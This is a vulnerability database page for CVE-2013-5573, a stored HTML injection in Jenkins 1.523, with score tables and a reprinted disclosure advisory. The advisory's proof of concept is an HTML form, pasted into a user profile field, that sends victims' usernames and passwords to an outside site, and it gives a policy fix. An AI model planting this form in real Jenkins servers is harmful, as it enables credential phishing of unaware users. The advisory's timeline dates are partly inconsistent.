CPE, which stands for Common Platform Enumeration, is a standardized scheme for naming hardware, software, and operating systems. CPE provides a structured naming scheme to uniquely identify and classify information technology systems, platforms, and packages based on certain attributes such as vendor, product name, version, update, edition, and language.
CWE, or Common Weakness Enumeration, is a comprehensive list and categorization of software weaknesses and vulnerabilities. It serves as a common language for describing software security weaknesses in architecture, design, code, or implementation that can lead to vulnerabilities.
CAPEC, which stands for Common Attack Pattern Enumeration and Classification, is a comprehensive, publicly available resource that documents common patterns of attack employed by adversaries in cyber attacks. This knowledge base aims to understand and articulate common vulnerabilities and the methods attackers use to exploit them.
Services & Price
Help & Info
Search : CVE id, CWE id, CAPEC id, vendor or keywords in CVE
Cross-site scripting (XSS) vulnerability in the default markup formatter in Jenkins 1.523 allows remote attackers to inject arbitrary web script or HTML via the Description field in the user configuration.
Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') The product does not neutralize or incorrectly neutralizes user-controllable input before it is placed in output that is used as a web page that is served to other users.
Metrics
Metrics
Score
Severity
CVSS Vector
Source
V2
4.3
AV:N/AC:M/Au:N/C:N/I:P/A:N
nvd@nist.gov
EPSS
EPSS is a scoring model that predicts the likelihood of a vulnerability being exploited.
EPSS Score
The EPSS model produces a probability score between 0 and 1 (0 and 100%). The higher the score, the greater the probability that a vulnerability will be exploited.
Date
EPSS V0
EPSS V1
EPSS V2 (> 2022-02-04)
EPSS V3 (> 2025-03-07)
EPSS V4 (> 2025-03-17)
2022-02-06
–
–
2.26%
–
–
2022-02-20
–
–
2.26%
–
–
2022-04-03
–
–
2.26%
–
–
2022-08-28
–
–
2.26%
–
–
2023-03-12
–
–
–
3.34%
–
2024-02-11
–
–
–
3.34%
–
2024-06-02
–
–
–
3.34%
–
2024-08-25
–
–
–
3.34%
–
2024-12-22
–
–
–
0.92%
–
2025-01-19
–
–
–
0.92%
–
2025-03-18
–
–
–
–
2.74%
2025-03-18
–
–
–
–
2.74,%
EPSS Percentile
The percentile is used to rank CVE according to their EPSS score. For example, a CVE in the 95th percentile according to its EPSS score is more likely to be exploited than 95% of other CVE. Thus, the percentile is used to compare the EPSS score of a CVE with that of other CVE.
Publication date : 2013-12-17 23h00 +00:00 Author : Christian Catalano EDB Verified : No
###################################################
01. ### Advisory Information ###
Title: Default markup formatter permits offsite-bound forms
Date published : 2013-12-16
Date of last update: 2013-12-16
Vendors contacted : Jenkins CI v 1.523
Discovered by: Christian Catalano
Severity: Low
02. ### Vulnerability Information ###
CVE reference: CVE-2013-5573
CVSS v2 Base Score: 4.7
CVSS v2 Vector : (AV:N/AC:L/Au:M/C:P/I:P/A:N)
Component/s : Jenkins CI v 1.523
Class : HTML Injection
03. ### Introduction ###
Jenkins CI is an extendable open source continuous integration server
http://jenkins-ci.org.
04. ### Vulnerability Description ###
The default installation and configuration of Jenkins CI is prone to a
security vulnerability. The Jenkins CI default markup formatter permits
offsite-bound forms. This vulnerability could be exploited by a remote
attacker (a malicious user) to inject malicious persistent HTML script
code (application side).
05. ### Technical Description / Proof of Concept Code ###
The vulnerability is located in the 'Descriotion' input field of the
User Configuration function:
https://localhost:9444/jenkins/user/attacker/configure
To reproduce the vulnerability, the attacker (a malicious user) can add
the malicious HTML script code:
<form method="POST" action="http://www.mocksite.org/login/login.php.">
Username: <input type="text" name="username" size="15" /><br />
Password: <input type="password" name="passwort" size="15" /><br />
<div align="center">
<p><input type="submit" value="Login" /></p>
</div>
</form>
in the 'Descriotion' input field and click on save button.
The code execution happens when the victim (an unaware user) view the
'People List'
https://localhost:9444/jenkins/asynchPeople/
and click on attacker user id.
06. ### Business Impact ###
Exploitation of the persistent web vulnerability requires a low
privilege web application user account.
Successful exploitation of the vulnerability results in persistent
phishing and persistent external redirects.
07. ### Systems Affected ###
This vulnerability was tested against:
Jenkins CI v1.523
Older versions are probably affected too, but they were not checked.
08. ### Vendor Information, Solutions and Workarounds ###
Currently, there are no known upgrades or patches to correct this
vulnerability. It is possible to temporarily mitigate the flaw by
implementing the following workaround:
'MyspacePolicy' permits
tag("form", "action", ONSITE_OR_OFFSITE_URL,
"method");
Fix 'MyspacePolicy' by restricting the policy to ONSITE_URL only or
perhaps <form> could be banned entirely.
09. ### Credits ###
This vulnerability has been discovered by:
Christian Catalano aka wastasy ch(dot)catalano(at)gmail(dot)com
10. ### Vulnerability History ###
August 21th, 2013: Vulnerability identification
August 4th, 2013: Vendor notification [Jenkins CI]
November 19th, 2013: Vulnerability confirmation [Jenkins CI]
November 19th, 2013: Vendor Solution
December 16th, 2013: Vulnerability disclosure
11. ### Disclaimer ###
The information contained within this advisory is supplied "as-is" with
no warranties or guarantees of fitness of use or otherwise.
I accept no responsibility for any damage caused by the use or misuse of
this information.
###################################################